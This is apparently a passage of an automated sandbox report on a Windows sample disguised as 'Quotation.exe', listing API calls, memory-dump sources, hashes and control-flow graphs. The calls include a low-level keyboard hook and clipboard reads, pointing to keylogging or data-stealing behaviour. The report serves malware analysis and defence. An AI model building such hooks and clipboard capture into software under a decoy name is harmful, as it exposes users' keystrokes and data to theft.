                                                                                              • Instruction Fuzzy Hash: 97F09077800A008EE3416B54AD01B6777A4EBD1305F09C53EEE88A62A1DB794C628A5E
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403436,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00406CF4
                                                                                              • CharPrevW.USER32(?,00000000), ref: 00406D05
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrlen
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 2709904686-3976562730
                                                                                              • Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                                                                              • Instruction ID: 8ca8e9e1e5128dac63b4d4f5950f4db4f9885d0bf84f26727eb387c0c5501f09
                                                                                              • Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                                                                              • Instruction Fuzzy Hash: 75D05E31015924DBD7626B18ED059AF77A8EF0130030A846EE983E3164CB385C9187BD

                                                                                              Execution Graph

                                                                                              Execution Coverage:10.1%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:2.6%
                                                                                              Total number of Nodes:115
                                                                                              Total number of Limit Nodes:15
                                                                                              execution_graph 24308 385e966a 24309 385e9625 24308->24309 24311 385e9668 24309->24311 24312 385e8828 24309->24312 24314 385e97f0 SetWindowsHookExA 24312->24314 24315 385e987a 24314->24315 24315->24309 24292 385e5e88 24293 385e5ece GetCurrentProcess 24292->24293 24295 385e5f19 24293->24295 24296 385e5f20 GetCurrentThread 24293->24296 24295->24296 24297 385e5f5d GetCurrentProcess 24296->24297 24298 385e5f56 24296->24298 24299 385e5f93 24297->24299 24298->24297 24300 385e5fbb GetCurrentThreadId 24299->24300 24301 385e5fec 24300->24301 24316 385e7b68 OleInitialize 24317 385e7bcc 24316->24317 24203 ad044 24204 ad05c 24203->24204 24205 ad0b6 24204->24205 24210 385e252b 24204->24210 24214 385e6cba 24204->24214 24224 385e065c 24204->24224 24234 385e2530 24204->24234 24211 385e2556 24210->24211 24212 385e065c 3 API calls 24211->24212 24213 385e2577 24212->24213 24213->24205 24217 385e6ce0 24214->24217 24215 385e6d41 24219 385e6d3f 24215->24219 24256 385e5cbc 24215->24256 24217->24215 24218 385e6d31 24217->24218 24238 385e6e5f 24218->24238 24242 38741288 24218->24242 24247 385e6e68 24218->24247 24251 38741280 24218->24251 24225 385e0667 24224->24225 24226 385e6d41 24225->24226 24228 385e6d31 24225->24228 24227 385e5cbc 3 API calls 24226->24227 24229 385e6d3f 24226->24229 24227->24229 24230 385e6e5f 3 API calls 24228->24230 24231 38741280 3 API calls 24228->24231 24232 385e6e68 3 API calls 24228->24232 24233 38741288 3 API calls 24228->24233 24230->24229 24231->24229 24232->24229 24233->24229 24235 385e2556 24234->24235 24236 385e065c 3 API calls 24235->24236 24237 385e2577 24236->24237 24237->24205 24239 385e6e76 24238->24239 24240 385e5cbc 3 API calls 24239->24240 24241 385e6f4e 24239->24241 24240->24239 24241->24219 24244 3874129c 24242->24244 24243 38741328 24243->24219 24263 38741337 24244->24263 24268 38741340 24244->24268 24248 385e6e76 24247->24248 24249 385e5cbc 3 API calls 24248->24249 24250 385e6f4e 24248->24250 24249->24248 24250->24219 24253 3874129c 24251->24253 24252 38741328 24252->24219 24254 38741337 3 API calls 24253->24254 24255 38741340 3 API calls 24253->24255 24254->24252 24255->24252 24257 385e5cc7 24256->24257 24258 385e6faa 24257->24258 24259 385e7054 24257->24259 24260 385e7002 CallWindowProcW 24258->24260 24262 385e6fb1 24258->24262 24261 385e065c 2 API calls 24259->24261 24260->24262 24261->24262 24262->24219 24264 38741340 24263->24264 24265 38741378 24263->24265 24266 38741351 24264->24266 24271 38742509 24264->24271 24266->24243 24269 38741351 24268->24269 24270 38742509 3 API calls 24268->24270 24269->24243 24270->24269 24274 385e5cbc 3 API calls 24271->24274 24276 385e5caf 24271->24276 24284 385e6f60 24271->24284 24272 3874251a 24272->24266 24274->24272 24277 385e5c5c 24276->24277 24278 385e5cb3 24276->24278 24279 385e6faa 24278->24279 24280 385e7054 24278->24280 24281 385e7002 CallWindowProcW 24279->24281 24283 385e6fb1 24279->24283 24282 385e065c 2 API calls 24280->24282 24281->24283 24282->24283 24283->24272 24285 385e6faa 24284->24285 24286 385e7054 24284->24286 24287 385e7002 CallWindowProcW 24285->24287 24289 385e6fb1 24285->24289 24288 385e065c 2 API calls 24286->24288 24287->24289 24288->24289 24289->24272 24290 385e60d0 DuplicateHandle 24291 385e6166 24290->24291 24302 385e2430 24303 385e243b CreateWindowExW 24302->24303 24304 385e249c 24303->24304 24304->24304 24305 385e7cb0 24306 385e7d0a OleGetClipboard 24305->24306 24307 385e7d4a 24306->24307 24318 385e72a0 24319 385e72e1 KiUserCallbackDispatcher 24318->24319 24320 385e730e 24319->24320 24321 1508ea 24322 15084e 24321->24322 24322->24321 24323 15091b 24322->24323 24325 151388 24322->24325 24326 15138b 24325->24326 24327 151480 24326->24327 24328 15143b LdrInitializeThunk 24326->24328 24330 157e3b 24326->24330 24327->24322 24328->24326 24331 157dae 24330->24331 24331->24330 24332 157e5f 24331->24332 24334 158892 24331->24334 24332->24326 24336 158741 24334->24336 24335 1588aa LdrInitializeThunk 24335->24336 24336->24334 24336->24335 24337 158f05 24336->24337 24337->24331

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 38103128-38103153 3 38103155-38103158 0->3 4 3810316c-38103176 0->4 3->4 5 3810315a-3810316a 3->5 8 3810317c-3810318b 4->8 5->8 117 3810318d call 38103921 8->117 118 3810318d call 38103928 8->118 9 38103192-38103197 10 381031a4-38103481 9->10 11 38103199-38103913 9->11 33 381038c1-381038ce 10->33 34 38103487-38103536 10->34 43 38103538-3810355d 34->43 44 3810355f 34->44 46 38103568-3810357b 43->46 44->46 48 38103581-381035a3 46->48 49 381038a8-381038b4 46->49 48->49 52 381035a9-381035b3 48->52 49->34 50 381038ba 49->50 50->33 52->49 53 381035b9-381035c4 52->53 53->49 54 381035ca-381036a0 53->54 66 381036a2-381036a4 54->66 67 381036ae-381036de 54->67 66->67 71 381036e0-381036e2 67->71 72 381036ec-381036f8 67->72 71->72 73 38103758-3810375c 72->73 74 381036fa-381036fe 72->74 75 38103762-3810379e 73->75 76 38103899-381038a2 73->76 74->73 77 38103700-3810372a 74->77 87 381037a0-381037a2 75->87 88 381037ac-381037ba 75->88 76->49 76->54 84 38103738-38103755 77->84 85 3810372c-3810372e 77->85 84->73 85->84 87->88 91 381037d1-381037dc 88->91 92 381037bc-381037c7 88->92 96 381037f4-38103805 91->96 97 381037de-381037e4 91->97 92->91 95 381037c9 92->95 95->91 101 38103807-3810380d 96->101 102 3810381d-38103829 96->102 98 381037e6 97->98 99 381037e8-381037ea 97->99 98->96 99->96 103 38103811-38103813 101->103 104 3810380f 101->104 106 38103841-38103892 102->106 107 3810382b-38103831 102->107 103->102 104->102 106->76 108 38103833 107->108 109 38103835-38103837 107->109 108->106 109->106 117->9 118->9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $q$$q$$q$$q$$q$$q
                                                                                              • API String ID: 0-2069967915
                                                                                              • Opcode ID: b1432d2a7b754745e253c79512b620d75e90b0fa26140887939db68e953be7b0
                                                                                              • Instruction ID: 1068d1088543412b5baa3bc0bee14c26a41ea4e72825a9309eede060a2d407ba
                                                                                              • Opcode Fuzzy Hash: b1432d2a7b754745e253c79512b620d75e90b0fa26140887939db68e953be7b0
                                                                                              • Instruction Fuzzy Hash: 13220D35E10719CBDB15DF79C85069DF7B2BFD9300F61C6AAD409AB224EB30A985CB90
                                                                                              APIs
                                                                                              • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,385E9658,00000000,00000000), ref: 385E986B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2559412058-0
                                                                                              • Opcode ID: 5a33f8b39e7f3badca05d171d56a65448c99f080b5d5b6026c9a3012e4a3b2c9
                                                                                              • Instruction ID: 6b704c41126ef4a78b26c76b9b51629384fd3b1cfc2e8e3d909412ebb47c96fa
                                                                                              • Opcode Fuzzy Hash: 5a33f8b39e7f3badca05d171d56a65448c99f080b5d5b6026c9a3012e4a3b2c9
                                                                                              • Instruction Fuzzy Hash: B22115B5D042499FDB14DFAAC844BEEBBF5FB88310F10842AE458A7250CB74A945CFA5

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 119 385e5e81-385e5f17 GetCurrentProcess 123 385e5f19-385e5f1f 119->123 124 385e5f20-385e5f54 GetCurrentThread 119->124 123->124 125 385e5f5d-385e5f91 GetCurrentProcess 124->125 126 385e5f56-385e5f5c 124->126 128 385e5f9a-385e5fb5 call 385e6062 125->128 129 385e5f93-385e5f99 125->129 126->125 131 385e5fbb-385e5fea GetCurrentThreadId 128->131 129->128 133 385e5fec-385e5ff2 131->133 134 385e5ff3-385e6055 131->134 133->134
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 385E5F06
                                                                                              • GetCurrentThread.KERNEL32 ref: 385E5F43
                                                                                              • GetCurrentProcess.KERNEL32 ref: 385E5F80
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 385E5FD9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: a6f1791d81f443a1f60c568297119a35e54e77f1fcb06757c2dd73999c578533
                                                                                              • Instruction ID: 3c5061e012c5f708f3c13a88e29730f905e62eda57897df73107b199d0dc85d6
                                                                                              • Opcode Fuzzy Hash: a6f1791d81f443a1f60c568297119a35e54e77f1fcb06757c2dd73999c578533
                                                                                              • Instruction Fuzzy Hash: 805155B0D013098FDB14DFAAD945BDEBBF1AF88310F208159E419A7360DB346945CF66

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 141 385e5e88-385e5f17 GetCurrentProcess 145 385e5f19-385e5f1f 141->145 146 385e5f20-385e5f54 GetCurrentThread 141->146 145->146 147 385e5f5d-385e5f91 GetCurrentProcess 146->147 148 385e5f56-385e5f5c 146->148 150 385e5f9a-385e5fb5 call 385e6062 147->150 151 385e5f93-385e5f99 147->151 148->147 153 385e5fbb-385e5fea GetCurrentThreadId 150->153 151->150 155 385e5fec-385e5ff2 153->155 156 385e5ff3-385e6055 153->156 155->156
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 385E5F06
                                                                                              • GetCurrentThread.KERNEL32 ref: 385E5F43
                                                                                              • GetCurrentProcess.KERNEL32 ref: 385E5F80
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 385E5FD9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 3a89485b37012b15b1bd8a0296c99672f3a02c1fc1354b69b888a68b638f5809
                                                                                              • Instruction ID: 4f3bf2668ee9e25217312d6f132d3d08fd917af4e61fed303c4830bb0ed7f47f
                                                                                              • Opcode Fuzzy Hash: 3a89485b37012b15b1bd8a0296c99672f3a02c1fc1354b69b888a68b638f5809
                                                                                              • Instruction Fuzzy Hash: A25134B0D017098FDB14DFAAD945BDEBBF1AB88310F208159E419A7360DB34A945CF66

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 350 385e60c8-385e6164 DuplicateHandle 351 385e616d-385e618a 350->351 352 385e6166-385e616c 350->352 352->351
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 385E6157
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID: U
                                                                                              • API String ID: 3793708945-3372436214
                                                                                              • Opcode ID: 7e76d018a1075907b63f2f95e084f9dde86486b4b70861d87ae8d7e72e513b7d
                                                                                              • Instruction ID: f02a8e69588778929b068f46b24861f5fb1182db0361e2677d4a18b4c82af310
                                                                                              • Opcode Fuzzy Hash: 7e76d018a1075907b63f2f95e084f9dde86486b4b70861d87ae8d7e72e513b7d
                                                                                              • Instruction Fuzzy Hash: 0321D2B5D00248AFDB10CFAAD984ADEFFF4EB48320F14841AE958A7351D374A951CFA1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 355 385e2430-385e249a CreateWindowExW 357 385e249c-385e24a2 355->357 358 385e24a3-385e24db 355->358 357->358 362 385e24dd-385e24e0 358->362 363 385e24e8 358->363 362->363 364 385e24e9 363->364 364->364
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,0000000C,?,?,?), ref: 385E248A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID: 0
                                                                                              • API String ID: 716092398-4108050209
                                                                                              • Opcode ID: 8398329dc3da6e4335157d9cc944790f22ba9f452ba12cf6efed1f2ebe3d3b4b
                                                                                              • Instruction ID: 4a98fa10353f546b68b4891b88ff9434f2b6bdbe8bd1f16a565883fdd48ac76f
                                                                                              • Opcode Fuzzy Hash: 8398329dc3da6e4335157d9cc944790f22ba9f452ba12cf6efed1f2ebe3d3b4b
                                                                                              • Instruction Fuzzy Hash: C421CEB5800208EFEF15DFA4C884BDDBBB5BF08314F218149F918AB264CB75A845CFA0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1055 38108134-3810814e 1056 38108159-3810815b 1055->1056 1057 38108173-3810817a 1056->1057 1058 3810815d-38108163 1056->1058 1061 3810818b 1057->1061 1062 3810817c-38108189 1057->1062 1059 38108165 1058->1059 1060 38108167-38108169 1058->1060 1059->1057 1060->1057 1063 38108190-38108192 1061->1063 1062->1063 1064 38108194-38108197 1063->1064 1065 381081a9-381081e2 1063->1065 1066 38108456-3810845f 1064->1066 1071 381081e4-381081ee 1065->1071 1072 381081f8-38108207 1065->1072 1074 38108226-38108261 1072->1074 1075 38108209-38108224 1072->1075 1078 381083f2-38108407 1074->1078 1079 38108267-38108278 1074->1079 1075->1074 1078->1066 1083 381083dd-381083ec 1079->1083 1084 3810827e-3810829b 1079->1084 1083->1078 1083->1079 1084->1083 1088 381082a1-38108397 call 38106648 1084->1088 1112 381083a5 1088->1112 1113 38108399-381083a3 1088->1113 1114 381083aa-381083ac 1112->1114 1113->1114 1114->1083 1115 381083ae-381083b3 1114->1115 1116 381083c1 1115->1116 1117 381083b5-381083bf 1115->1117 1118 381083c6-381083c8 1116->1118 1117->1118 1118->1083 1119 381083ca-381083d6 1118->1119 1119->1083
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $q$$q
                                                                                              • API String ID: 0-3126353813
                                                                                              • Opcode ID: 31f8d070d5a2eda437e37a09855a3e54971bfe13de579aaf014095e9fb4984a5
                                                                                              • Instruction ID: af59e4db496a069a3434292009727728a4b471ca9a570dd113d6aa9f056bdd65
                                                                                              • Opcode Fuzzy Hash: 31f8d070d5a2eda437e37a09855a3e54971bfe13de579aaf014095e9fb4984a5
                                                                                              • Instruction Fuzzy Hash: 26718A74B043048FDB08DB79DC507AEBBE2AF88340F108569D405AB395EBB5ED82CB90
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495387457.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_150000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f2afec2bb4acc6c9394173437e27d82c4ba20dba8c8cd0fab2354a491c828bee
                                                                                              • Instruction ID: cef6016aa38b0ad00d13851e478b5f03b11e5248d6928593ec6ef1daa6c49d00
                                                                                              • Opcode Fuzzy Hash: f2afec2bb4acc6c9394173437e27d82c4ba20dba8c8cd0fab2354a491c828bee
                                                                                              • Instruction Fuzzy Hash: 55129470700205DFDB29AB38D49225D72A3EBD5342B108E29E415DF346CF75ED4B9B91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520082278.0000000038100000.00000040.00000800.00020000.00000000.sdmp, Offset: 38100000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_38100000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $
                                                                                              • API String ID: 0-3993045852
                                                                                              • Opcode ID: f1f52afc3dab423ab39daeb1412eeb30f0bb52d763f4ace2199b9c21223a6a09
                                                                                              • Instruction ID: 8289dd2430c3787433c77901cec62e32c8458da47bda0d7db5d568394a1824f6
                                                                                              • Opcode Fuzzy Hash: f1f52afc3dab423ab39daeb1412eeb30f0bb52d763f4ace2199b9c21223a6a09
                                                                                              • Instruction Fuzzy Hash: 2FE1A0B5E002148FDB14DBA8C8506DEBBB2FF89320F15856AD845BB359DB719D42CFA0
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 385E7029
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: 1018dc099b8ccba49e959bc5c857c71c5c81a0bd6be2684cb7a27a67ab5e8c85
                                                                                              • Instruction ID: c82a2e391af90d80115d2ff5e5a8edfbb58cb88c9c0296550cde84a2997b50cf
                                                                                              • Opcode Fuzzy Hash: 1018dc099b8ccba49e959bc5c857c71c5c81a0bd6be2684cb7a27a67ab5e8c85
                                                                                              • Instruction Fuzzy Hash: A1411AB9900305DFDB14CF99C888A9ABBF5FF88314F24C859E518A7321D775A941CFA1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard
                                                                                              • String ID:
                                                                                              • API String ID: 220874293-0
                                                                                              • Opcode ID: ff9793900c71a3d3a3db133a2da3229a0d17304034fa1c19c3320b76acdd5fcc
                                                                                              • Instruction ID: efe0eb022b17329b2fe32ffcf66467a19bf3c559ea4d24d9f13a144415f643c3
                                                                                              • Opcode Fuzzy Hash: ff9793900c71a3d3a3db133a2da3229a0d17304034fa1c19c3320b76acdd5fcc
                                                                                              • Instruction Fuzzy Hash: 223102B4D01348DFEB10CFA9D984BDDBBF1AF48304F2484A9E444AB290DBB4A845CF51
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2495387457.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_150000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: d716d246f11851cbab20706b28d8e8a30da788edaab818ac46bfbeb5c1f9481e
                                                                                              • Instruction ID: 46d085b8c3d44bed1f50e54fa4249b49b23f2b330da9cef13c057ab840b8f4fe
                                                                                              • Opcode Fuzzy Hash: d716d246f11851cbab20706b28d8e8a30da788edaab818ac46bfbeb5c1f9481e
                                                                                              • Instruction Fuzzy Hash: 6D21E430A00200EBEF3A5734D88837D3665E752327F04282AED16CF790DB289DC9C792
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard
                                                                                              • String ID:
                                                                                              • API String ID: 220874293-0
                                                                                              • Opcode ID: 0cbd59d47a3b37197728f35b3854885ca593273be046eb9b94684d60d2b6285a
                                                                                              • Instruction ID: e0db665b39ce46bbc50eb051ff1b4d2886ef42d922be871deb84e6162fa7c037
                                                                                              • Opcode Fuzzy Hash: 0cbd59d47a3b37197728f35b3854885ca593273be046eb9b94684d60d2b6285a
                                                                                              • Instruction Fuzzy Hash: 6531F1B0D01308DFDB14CFA9C984BDEBBF5BF48314F2480A9E404AB290DBB4A845CB65
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 385E6157
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 8bb0b893cb8f0e287108b013f515cd1b1679c257a9d5d643271568c0fb61602f
                                                                                              • Instruction ID: f4e63212b7c99505f83f439448b9709b53f5c8bc84435524e2e350d80d75a8cd
                                                                                              • Opcode Fuzzy Hash: 8bb0b893cb8f0e287108b013f515cd1b1679c257a9d5d643271568c0fb61602f
                                                                                              • Instruction Fuzzy Hash: DB21C4B5D012499FDB10CFAAD984ADEFBF4EB48320F14841AE958A3350D774A950CF65
                                                                                              APIs
                                                                                              • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,385E9658,00000000,00000000), ref: 385E986B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2559412058-0
                                                                                              • Opcode ID: 6d74121ca7b2270749f185a8672da0fc446113ff4f8cc749532a312ff4b623d9
                                                                                              • Instruction ID: 4e33714f2b53ae0fbd5b650a063630b67bbaf4b14eafc4ac71e634f7bcf4b691
                                                                                              • Opcode Fuzzy Hash: 6d74121ca7b2270749f185a8672da0fc446113ff4f8cc749532a312ff4b623d9
                                                                                              • Instruction Fuzzy Hash: 5721F4B5D002499FDB14CFAAD944BEEBBF5BF88310F10852AE459A7250CB74A941CFA1
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL ref: 385E72FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: a2fbd838e4bccf3f2681685c62109702be52e3b7274508be1586a08f0f67e6b1
                                                                                              • Instruction ID: 7ded2694af3d3a6dd1982c3223e15b678d5c085072185532ea49fe529092ced6
                                                                                              • Opcode Fuzzy Hash: a2fbd838e4bccf3f2681685c62109702be52e3b7274508be1586a08f0f67e6b1
                                                                                              • Instruction Fuzzy Hash: 031133B5C003498FDB20CFAAD845BEEFBF0AB48320F20841AD919A7251C375A940CFA0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: bc05b863b8640a6f1507c72fc766f41418b1fbd5ecb5bdc5f07759780e630823
                                                                                              • Instruction ID: d5294390b1fde645379cef36739fe71a955332d693c1d27837c1e561a096e250
                                                                                              • Opcode Fuzzy Hash: bc05b863b8640a6f1507c72fc766f41418b1fbd5ecb5bdc5f07759780e630823
                                                                                              • Instruction Fuzzy Hash: B11112B5C003488FDB20DFAAD945BEEBBF4AB48320F20845AD559A3610D379A944CFA5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.2520260130.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_385e0000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 03ebe23eb24dc15ba61f7b8790e8fe616dc9c6910af5a6bc7de06324d112dca2
                                                                                              • Instruction ID: 398aa0d11ef49b6fc6923c67e14544be6c574fb81b4772605cc2d98161768cf5
